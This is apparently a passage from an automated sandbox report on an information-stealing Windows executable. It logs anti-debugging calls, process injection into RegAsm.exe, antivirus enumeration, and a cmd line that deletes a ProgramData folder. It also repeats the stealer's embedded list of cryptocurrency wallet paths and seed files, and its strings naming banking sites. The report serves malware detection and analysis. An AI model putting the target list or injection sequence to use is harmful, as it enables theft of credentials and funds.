                  Source: JDGCGD.2.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: JDGCGD.2.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: JDGCGD.2.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: JDGCGD.2.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: JDGCGD.2.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: JDGCGD.2.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: JDGCGD.2.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: JDGCGD.2.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
                  Source: JDGCGD.2.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: JDGCGD.2.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: JDGCGD.2.dr | Binary or memory string: AMC password management pageVMware20,11696428655
                  Source: JDGCGD.2.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
                  Source: JDGCGD.2.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: JDGCGD.2.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: JDGCGD.2.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: JDGCGD.2.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: JDGCGD.2.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
                  Source: JDGCGD.2.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: RegAsm.exe, 00000002.00000002.2641787959.0000000000D45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                  Source: JDGCGD.2.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: JDGCGD.2.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: JDGCGD.2.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: JDGCGD.2.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | API call chain: ExitProcess graph end node
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ABA293 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                  Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AC1335 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ABE380 mov ecx, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AC1379 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AC9290 GetProcessHeap,
                  Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB623F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB6549 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB66A5 SetUnhandledExceptionFilter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0041937F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0041E438 SetUnhandledExceptionFilter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0041A8A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_6C7EB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_6C7EB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_6C99AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match | File source: Process Memory Space: file.exe PID: 6352, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 1600, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\file.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0149018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,
                  Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,
                  Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 422000
                  Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000
                  Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000
                  Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BB5008
                  Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exit
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB602C cpuid
                  Source: C:\Users\user\Desktop\file.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                  Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW,
                  Source: C:\Users\user\Desktop\file.exe | Code function: EnumSystemLocalesW,
                  Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                  Source: C:\Users\user\Desktop\file.exe | Code function: GetACP,IsValidCodePage,GetLocaleInfoW,
                  Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB643C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040FBCB GetProcessHeap,HeapAlloc,GetUserNameA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040FC92 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.ab0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 6352, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1600, type: MEMORYSTR
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: info.seco
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Exodus
